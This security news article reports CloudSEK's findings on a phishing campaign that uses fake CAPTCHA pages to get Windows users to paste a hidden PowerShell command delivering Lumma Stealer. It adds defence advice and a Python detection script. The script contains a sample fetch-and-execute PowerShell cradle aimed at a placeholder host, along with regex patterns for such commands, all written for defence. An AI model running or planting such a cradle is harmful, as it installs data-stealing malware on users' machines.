- Phishing campaign mimics CAPTCHA to deliver hidden malware commands
- PowerShell command hidden in verification leads to Lumma Stealer attack
- Educating users on phishing tactics is key to preventing such attacks
CloudSEK has revealed a sophisticated method of distributing the Lumma Stealer malware, which poses a serious threat to Windows users.
This technique relies on deceptive human verification pages that trick users into unwittingly executing malicious commands.
Although the campaign is primarily focused on spreading the Lumma Stealer malware, its methodology could potentially be adapted to deliver a wide variety of other malicious software.
This is how the phishing campaign works
The campaign hosts its phishing pages on trusted platforms such as Amazon S3 and various Content Delivery Networks (CDNs), and delivers the malware in stages: the initial executable downloads additional components or modules, which complicates detection and analysis.
The infection chain in this phishing campaign begins with threat actors luring victims to phishing websites that mimic legitimate Google CAPTCHA verification pages. These pages are presented as a necessary identity verification step, tricking users into thinking they are completing a standard security check.
The attack takes a more deceptive turn when the user clicks the “Confirm” button. Behind the scenes, a hidden JavaScript function copies a base64-encoded PowerShell command to the user’s clipboard without their knowledge. The phishing site then instructs the user to perform an unusual series of steps, such as opening the Run dialog box (Win+R) and pasting the copied command. When followed, these instructions cause the PowerShell command to run in a hidden window that the user never sees, so the victim is unlikely to notice that anything has happened.
The hidden PowerShell command is the core of the attack. It connects to a remote server to download additional content, such as a text file (a.txt) containing instructions to download and execute the Lumma Stealer malware. Once installed on the system, the malware establishes connections with attacker-controlled domains, which lets the attackers steal sensitive data from the compromised machine and potentially stage further malicious activity.
To protect against this phishing campaign, users and organizations alike must prioritize security awareness and implement proactive defenses. A critical first step is user education.
The deceptive nature of these attacks – disguised as legitimate verification processes – shows the importance of informing users of the dangers of following suspicious prompts, especially when they are asked to copy and paste unknown commands. Users must be trained to recognize phishing tactics and question unexpected CAPTCHA confirmations or unfamiliar instructions that involve running system commands.
In addition to education, implementing robust endpoint protection is critical to defending against PowerShell-based attacks. Since attackers in this campaign rely heavily on PowerShell to execute malicious code, organizations should ensure that their security solutions are capable of detecting and blocking these activities. Advanced endpoint protection tools with behavioral analysis and real-time monitoring can detect unusual command executions, helping to prevent the malware from being downloaded and installed.
Organizations should also take a proactive approach by monitoring network traffic for suspicious activity. Security teams must pay close attention to connections with newly registered or unusual domains, which are often used by attackers to distribute malware or steal sensitive data.
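As an added example, not code from CloudSEK or from the campaign, the following Python sketch shows what the endpoint-side detection described above can look like: it decodes a PowerShell `-EncodedCommand` blob from a process-creation log line and flags the combination the attack chain produces (a hidden window, an encoded command, a parent process of explorer.exe, which is what a command pasted into the Run dialog looks like, and a download cradle), then pulls out any URLs for the network monitoring step. The log format, the sample events and the URL `203.0.113.10/a.txt` are constructed for illustration; only the file name `a.txt` comes from the report.

```python
"""Detection sketch for a pasted, hidden, encoded PowerShell launch (ClickFix-style).

Added example, not code from CloudSEK's report. The log lines and the encoded
command are constructed; the field layout loosely follows Sysmon Event ID 1
(process creation), and http://203.0.113.10/a.txt is a documentation-range
placeholder, not an indicator from the campaign.
"""
import base64
import re
from typing import Optional


def encode_powershell(script: str) -> str:
    """Encode a script the way `powershell -EncodedCommand` expects it: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_powershell(blob: str) -> Optional[str]:
    """Reverse of encode_powershell; None when the blob is not valid -EncodedCommand input."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


# PowerShell accepts unambiguous prefixes of parameter names, so -e, -ec, -enc all mean -EncodedCommand.
ENCODED_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")
HIDDEN_FLAG = re.compile(r"(?i)-(?:w|win|windowstyle)\s+(?:hidden|1)\b")
# Download cradles: fetch remote content and execute it in memory.
CRADLE = re.compile(r"(?i)(?:\biwr\b|invoke-webrequest|downloadstring|invoke-expression|\biex\b)")
URL = re.compile(r"https?://[^\s'\"()]+")


def parse_event(line: str) -> dict:
    """Split a constructed 'Key: value|Key: value' line into a field map."""
    fields = {}
    for part in line.split("|"):
        key, _, value = part.partition(": ")
        fields[key.strip()] = value.strip()
    return fields


def assess(event: dict) -> dict:
    """Score one process-creation event and return the indicators that fired."""
    cmd = event.get("CommandLine", "")
    parent = event.get("ParentImage", "").lower()
    findings = []
    decoded = None

    match = ENCODED_FLAG.search(cmd)
    if match:
        decoded = decode_powershell(match.group(1))
        if decoded is not None:
            findings.append("encoded_command")
    if HIDDEN_FLAG.search(cmd):
        findings.append("hidden_window")
    # A command pasted into the Run dialog (Win+R) is spawned by explorer.exe; admin
    # scripts usually come from cmd.exe, a scheduler or a management agent instead.
    if parent.endswith("\\explorer.exe"):
        findings.append("launched_from_run_dialog")

    # Inspect the decoded script when there is one, otherwise the raw command line.
    text = decoded if decoded is not None else cmd
    if CRADLE.search(text):
        findings.append("download_cradle")
    urls = URL.findall(text)  # hand these to network monitoring / domain-age checks
    return {
        "suspicious": len(findings) >= 3,
        "findings": findings,
        "decoded": decoded,
        "urls": urls,
    }


def scan(lines) -> list:
    """Assess every log line and return one result per line."""
    return [assess(parse_event(line)) for line in lines]


# Constructed sample: the script the clipboard payload would run, then two events
# (one pasted-from-Run-dialog launch, one ordinary admin script from cmd.exe).
MALICIOUS_SCRIPT = "iex (iwr 'http://203.0.113.10/a.txt' -UseBasicParsing).Content"  # placeholder URL
SAMPLE_EVENTS = [
    r"Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    r"|ParentImage: C:\Windows\explorer.exe"
    r"|CommandLine: powershell -w hidden -eC " + encode_powershell(MALICIOUS_SCRIPT),
    r"Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    r"|ParentImage: C:\Windows\System32\cmd.exe"
    r"|CommandLine: powershell -ExecutionPolicy Bypass -File C:\scripts\backup.ps1",
]

if __name__ == "__main__":
    for result in scan(SAMPLE_EVENTS):
        print(result["suspicious"], result["findings"], result["urls"])
```

Three or more of the four indicators together are rare in legitimate administration, but the threshold and the parent-process rule should be tuned against your own telemetry; the decoded script and extracted URLs are what an analyst needs to pivot into the newly registered or unusual domains mentioned above.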
Finally, keeping systems updated with the latest patches is a crucial defense mechanism. Regular updates ensure that known vulnerabilities are addressed, limiting the opportunity for attackers to exploit outdated software in their efforts to distribute malware like Lumma Stealer.
“This new tactic is particularly dangerous because it plays on users’ trust in commonly accepted CAPTCHA verifications that they encounter regularly online. By hiding malicious activity behind what appears to be a routine security check, attackers can easily trick users into executing malicious commands on their systems. What is more worrying is that this technique, which currently distributes Lumma Stealer, can be adapted to spread other types of malware, making it a very versatile and evolving threat,” said Anshuman Das, security researcher at CloudSEK.